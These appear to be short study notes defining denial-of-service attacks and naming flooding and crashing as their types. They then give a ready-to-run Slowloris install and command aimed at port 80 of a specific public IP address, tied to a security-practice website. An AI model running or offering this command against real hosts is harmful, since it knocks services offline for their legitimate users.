What is a denial of service attack (DoS) ?
=
A Denial-of-Service (DoS) attack is an attack meant to shut down a machine or network,
making it inaccessible to its intended users. DoS attacks accomplish this by flooding the target with traffic, or sending it information that triggers a crash.
In both instances, the DoS attack deprives legitimate users 
(i.e. employees, members, or account holders) of the service or resource they expected.


Types of DOS Attacks?
=
1: Flooding the services 
2: Crashing the services 


////////////////////////////////////////////////////////////////////// SLOWLORIS //////////////////////////////////////////////////////////////////////////////////////////


//open the terminal 
  pip install slowloris 

  commmands
  slowloris -s 500 -p 80 31.3.96.40                ------------ here it was www.itsecgames.com
  
  -s for sockets 
  -p genralised ports 80
